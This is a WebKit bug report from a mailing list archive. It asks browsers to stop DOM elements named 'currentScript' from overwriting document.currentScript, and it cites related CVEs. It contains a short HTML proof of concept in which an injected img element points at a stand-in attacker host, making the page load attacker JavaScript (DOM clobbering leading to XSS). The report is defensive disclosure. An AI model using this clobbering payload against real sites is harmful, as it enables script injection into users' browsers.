[Webkit-unassigned] [Bug 281129] New: Prevent document.currentScript from being overwritten via a DOM element with name='currentScript'

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Wed Oct 9 02:44:13 PDT 2024 

https://bugs.webkit.org/show_bug.cgi?id=281129

            Bug ID: 281129
           Summary: Prevent document.currentScript from being overwritten
                    via a DOM element with name='currentScript'
           Product: WebKit
           Version: Other
          Hardware: All
                OS: All
            Status: NEW
          Severity: Enhancement
          Priority: P2
         Component: DOM
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: jujjyl at gmail.com

There is a relatively common source of CVEs that is being reported, e.g.

- https://vulert.com/vuln-db/CVE-2024-45389
- https://github.com/advisories/GHSA-gcx4-mw62-g8wm
- https://nvd.nist.gov/vuln/detail/CVE-2024-45812
- https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

based on a "DOM clobbering" technique, where if an attacker can inject a DOM element with a `name='currentScript'` attribute, and the page happens to read `document.currentScript.src` to decide what URL to load a sibling JS file, then an attacker can elevate their attack threat vector from DOM clobbering to a XSS scripting attack.

I.e.

```html
<html><body>
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
var script = document.createElement('script');
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
</script></body></html>
```
will undesirably load `http://bad.attacker.site.com/sibling.js` instead of `/sibling.js` from the same server that the HTML site is served at.

This is discussed in the WhatWG/HTML ticket at https://github.com/whatwg/html/issues/10687 where it is asked that browsers would blacklist the special `name="currentScript"` attribute from clobbering `document.currentScript`. A WPT test is added at https://github.com/web-platform-tests/wpt/pull/48536 .

Would Apple agree to enforce this security restriction and +1 the proposal at https://github.com/whatwg/html/issues/10687 ?

(this is a security problem, but not marking it hidden since there are already so many public CVEs that have been reported and the issue is known for at least since 2016)

-- 
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-unassigned/attachments/20241009/e0f91993/attachment.htm>

More information about the webkit-unassigned mailing list